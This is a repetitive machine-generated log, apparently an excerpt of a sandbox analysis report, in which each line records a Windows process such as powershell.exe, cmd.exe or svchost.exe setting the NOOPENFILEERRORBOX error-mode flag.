                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
